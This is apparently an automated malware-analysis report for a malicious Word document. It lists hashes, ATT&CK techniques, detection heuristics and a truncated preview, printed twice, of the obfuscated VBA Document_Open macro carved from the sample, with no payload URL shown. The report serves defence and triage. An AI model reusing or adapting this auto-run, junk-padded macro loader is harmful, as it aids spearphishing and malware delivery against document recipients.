Office (OLE) malware analysis — malicious · 19f2c7093452e7e5

MALICIOUS

Office (OLE)

202.7 KB Created: 2019-12-20 07:10:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 72c6eb8e0e22603c036323b50045d758 SHA-1: adc8fbd2694e19bc2e3b035c24ee728c998afbfc SHA-256: 19f2c7093452e7e5230593bed7cbcf8ce570ee2eadd6fa0513349c4f2dd4a175

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for initial execution. The macro's code is heavily obfuscated and truncated, but the presence of GetObject and p-code execution suggests it attempts to download and run a secondary payload. The document is likely delivered as a spearphishing attachment.

Heuristics 5

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13029 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13029 bytes
SHA-256: `01c215d24daeefe990969e8c05c3b03bd61a086b369c7269601a3135fcc078a7`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Vxhmmvbaq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Uvyizjypph, 0, 0, MSForms, TextBox" Private Sub Document_open() Dim Qfxrbphtdohcu As String Dim Vzhnsdtsv As String Zpjrgufusy = Yhvepkxf Siyfeutxm = (Pqrjlimx) Kewjgxyeiymou = 61 Dim Tapkaulo As Boolean Rdvdbkhyfh = "Accusamus ab eum sed." Dim Wyxvtecn As Double Dim Uisixmyeyquz As Double Dim Dahoeqopyreq As String Bgloiviml = (194) Dim Vzajnhwjes As Double Dim Oilgfkbegytdr As Integer Rtkqpocjq = Ljhhjnijx Dim Odckofwgxrice As String Dim Bdilzuszyrwz As Boolean Dim Uhgzuehne As String Nkqocgcqplfbl = (Wddsrfga) Cdkmmoyipl = ("Laboriosam quaerat.") Kwltjztp = (Sridjmirgjnf) Dim Sedxgtwv As Double Thhywhgnchks = Emaxfaoewh Wzydftpqq Dim Gkumihrvjg As Double Dim Dkcczrfto As String Uuhlarewpp = Usrfkdszyx Glawtnzykaar = (Refjutuzhjhlv) Wlxtpfpqhdcqk = 106 Dim Szdomntodiwg As String Ohrjcopcymq = "Animi et et aliquam." Dim Xgrckznrhhg As Integer Dim Cxultylasv As Boolean Dim Imepbrykz As Boolean Lfmhpzhzk = (350) Dim Lrimtrqnelgv As Boolean Dim Jbfqitihpi As String Rvalvabob = Oygtlqwfj Dim Gxbjclkecahm As Integer Dim Mspgunlwvqrb As Double Dim Qscvwwodklype As Integer Ghmgyyygzp = (Kcksalnnjx) Dgjieieiolo = ("Sint dolore est architecto et molestiae.") Vcysldgzn = (Ztxerjbi) Dim Crppcqlotznbm As Double Pvxteqqcii = Zrfkgmjski End Sub Attribute VB_Name = "Qzuqpezagbmaa" Attribute VB_Base = "0{0982BE0D-4F0C-4E72-8F27-23E0D733C353}{1F187481-6304-4745-AF4B-2656848B55EB}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Miqfbsgds" Function Vfbbzngres() Dim Pxrhifzlzvlc As String Dim Xpfftqarxt As String Ngxvkylofaace = Qoeroetmumk Syaxymssod = (Rkhwocatzkc) Usuucjzo = 743 Dim Gadeshybksext As String Gkkpkhvhveu = "Tempora cumque modi quia." Dim Mumzpoawlyima As String Dim Axwyiewzpyro As Integer Dim Hayjapqgfiek As Double Lbdjzegyhvpu = (910) Dim Xaxaqeexkcas As String Dim Souylbnnviog As String Sctfzuifl = Oqnraigcmgtb Dim Nijeoljsvf As Boolean Dim Vtglncqdwl As Boolean Dim Uaiezcybcxmmz As String Slwuijrnnwatq = (Mcinjodfstg) Xhummgxsz = ("Magnam consectetur labore.") Mdmuhziiqnk = (Lqipgebc) Dim Pgbngknwmm As Double Gbixtlyp = Xqawximvooh Ytgqobwapext = Vxhmmvbaq.Uvyizjypph Dim Ywdggzsakinwk As Integer Dim Mthdwzpnoli As String Pmiyobtov = Yqqmuzvs Rwfdjwiiov = (Jlyaohixb) Gegjdsoqpbvy = 796 Dim Vffkghfd As Double Fnuknkrla = "Corey" Dim Zcnfpzeihomix As Double Dim Dnvjmdpa As Double Dim Xdcfjjxldwc As Boolean Qhauirsex = (542) Dim Geqqrvjciq As Double Dim Ccxeoxuxzliec As Integer Gilkamqyet = Hmzjoylyskmd Dim Tlvwlogm As Double Dim Xfrjldslidml As String Dim Tfrnqvwi As Boolean Tfdiisnvifmih = (Orbveqiltc) Svhxocuqgzkcp = ("Quidem accusamus.") Cuqlypacevmz = (Ukgcuvzbhx) Dim Lfohyfozfqc As String Istdcbdnf = Davusbmteld Cghzatntygqc = Ytgqobwapext + Qzuqpezagbmaa.Dzglcoabtn + Qzuqpezagbmaa.Vxqripsemcmx + Qzuqpezagbmaa.Sgydedibfwog Dim Lugkrqtb As String Dim Avlkjhwqphxb As String Ijkdbmlmixqrq = Bevofaemsrzjk Cjoibifqzqjo = (Urqfsncbmzx) Slccbkqugdiop = 722 Dim Wywmrxxajdr As Double Bxplylmfwni = "Ratione porro optio dolorem saepe repellendus repudiandae cumque autem." Dim Uooiqdqoeodkl As Double Dim Ksyjvbtjnxqd As Double Dim Zkojvdima As Integer Yawimammrve = (885) Dim Hvbfalzaggedo As Double Dim Vmyslvxawab As Double Rtmvwpbab = Pnnsurexzw Dim Wldckuef As Double Dim Vintihzapuj As Integer Dim Xifgevex As Double Oqktnrgx = (Asefaixyzg) Kifufozjurnh = ("Doloribus consequuntur ducimus esse quia ea qui a.") Ynlijwmz = (Dzfwygybe) Dim Bntlrxosi As Double Hxjjmqxzikgaq = Dkotlcdxxa Domfzqsqs = Cghzatntygqc + Qzuqpez ... (truncated)

SHA-256: 01c215d24daeefe990969e8c05c3b03bd61a086b369c7269601a3135fcc078a7

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Vxhmmvbaq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Uvyizjypph, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Dim Qfxrbphtdohcu As String
Dim Vzhnsdtsv As String
Zpjrgufusy = Yhvepkxf
Siyfeutxm = (Pqrjlimx)
Kewjgxyeiymou = 61
Dim Tapkaulo As Boolean
Rdvdbkhyfh = "Accusamus ab eum sed."
Dim Wyxvtecn As Double
Dim Uisixmyeyquz As Double
Dim Dahoeqopyreq As String
Bgloiviml = (194)
Dim Vzajnhwjes As Double
Dim Oilgfkbegytdr As Integer
Rtkqpocjq = Ljhhjnijx
Dim Odckofwgxrice As String
Dim Bdilzuszyrwz As Boolean
Dim Uhgzuehne As String
Nkqocgcqplfbl = (Wddsrfga)
Cdkmmoyipl = ("Laboriosam quaerat.")
Kwltjztp = (Sridjmirgjnf)
Dim Sedxgtwv As Double
Thhywhgnchks = Emaxfaoewh
Wzydftpqq
   Dim Gkumihrvjg As Double
Dim Dkcczrfto As String
Uuhlarewpp = Usrfkdszyx
Glawtnzykaar = (Refjutuzhjhlv)
Wlxtpfpqhdcqk = 106
Dim Szdomntodiwg As String
Ohrjcopcymq = "Animi et et aliquam."
Dim Xgrckznrhhg As Integer
Dim Cxultylasv As Boolean
Dim Imepbrykz As Boolean
Lfmhpzhzk = (350)
Dim Lrimtrqnelgv As Boolean
Dim Jbfqitihpi As String
Rvalvabob = Oygtlqwfj
Dim Gxbjclkecahm As Integer
Dim Mspgunlwvqrb As Double
Dim Qscvwwodklype As Integer
Ghmgyyygzp = (Kcksalnnjx)
Dgjieieiolo = ("Sint dolore est architecto et molestiae.")
Vcysldgzn = (Ztxerjbi)
Dim Crppcqlotznbm As Double
Pvxteqqcii = Zrfkgmjski
End Sub

Attribute VB_Name = "Qzuqpezagbmaa"
Attribute VB_Base = "0{0982BE0D-4F0C-4E72-8F27-23E0D733C353}{1F187481-6304-4745-AF4B-2656848B55EB}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Miqfbsgds"
Function Vfbbzngres()
   Dim Pxrhifzlzvlc As String
Dim Xpfftqarxt As String
Ngxvkylofaace = Qoeroetmumk
Syaxymssod = (Rkhwocatzkc)
Usuucjzo = 743
Dim Gadeshybksext As String
Gkkpkhvhveu = "Tempora cumque modi quia."
Dim Mumzpoawlyima As String
Dim Axwyiewzpyro As Integer
Dim Hayjapqgfiek As Double
Lbdjzegyhvpu = (910)
Dim Xaxaqeexkcas As String
Dim Souylbnnviog As String
Sctfzuifl = Oqnraigcmgtb
Dim Nijeoljsvf As Boolean
Dim Vtglncqdwl As Boolean
Dim Uaiezcybcxmmz As String
Slwuijrnnwatq = (Mcinjodfstg)
Xhummgxsz = ("Magnam consectetur labore.")
Mdmuhziiqnk = (Lqipgebc)
Dim Pgbngknwmm As Double
Gbixtlyp = Xqawximvooh
Ytgqobwapext = Vxhmmvbaq.Uvyizjypph
   Dim Ywdggzsakinwk As Integer
Dim Mthdwzpnoli As String
Pmiyobtov = Yqqmuzvs
Rwfdjwiiov = (Jlyaohixb)
Gegjdsoqpbvy = 796
Dim Vffkghfd As Double
Fnuknkrla = "Corey"
Dim Zcnfpzeihomix As Double
Dim Dnvjmdpa As Double
Dim Xdcfjjxldwc As Boolean
Qhauirsex = (542)
Dim Geqqrvjciq As Double
Dim Ccxeoxuxzliec As Integer
Gilkamqyet = Hmzjoylyskmd
Dim Tlvwlogm As Double
Dim Xfrjldslidml As String
Dim Tfrnqvwi As Boolean
Tfdiisnvifmih = (Orbveqiltc)
Svhxocuqgzkcp = ("Quidem accusamus.")
Cuqlypacevmz = (Ukgcuvzbhx)
Dim Lfohyfozfqc As String
Istdcbdnf = Davusbmteld
Cghzatntygqc = Ytgqobwapext + Qzuqpezagbmaa.Dzglcoabtn + Qzuqpezagbmaa.Vxqripsemcmx + Qzuqpezagbmaa.Sgydedibfwog
   Dim Lugkrqtb As String
Dim Avlkjhwqphxb As String
Ijkdbmlmixqrq = Bevofaemsrzjk
Cjoibifqzqjo = (Urqfsncbmzx)
Slccbkqugdiop = 722
Dim Wywmrxxajdr As Double
Bxplylmfwni = "Ratione porro optio dolorem saepe repellendus repudiandae cumque autem."
Dim Uooiqdqoeodkl As Double
Dim Ksyjvbtjnxqd As Double
Dim Zkojvdima As Integer
Yawimammrve = (885)
Dim Hvbfalzaggedo As Double
Dim Vmyslvxawab As Double
Rtmvwpbab = Pnnsurexzw
Dim Wldckuef As Double
Dim Vintihzapuj As Integer
Dim Xifgevex As Double
Oqktnrgx = (Asefaixyzg)
Kifufozjurnh = ("Doloribus consequuntur ducimus esse quia ea qui a.")
Ynlijwmz = (Dzfwygybe)
Dim Bntlrxosi As Double
Hxjjmqxzikgaq = Dkotlcdxxa
Domfzqsqs = Cghzatntygqc + Qzuqpez
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.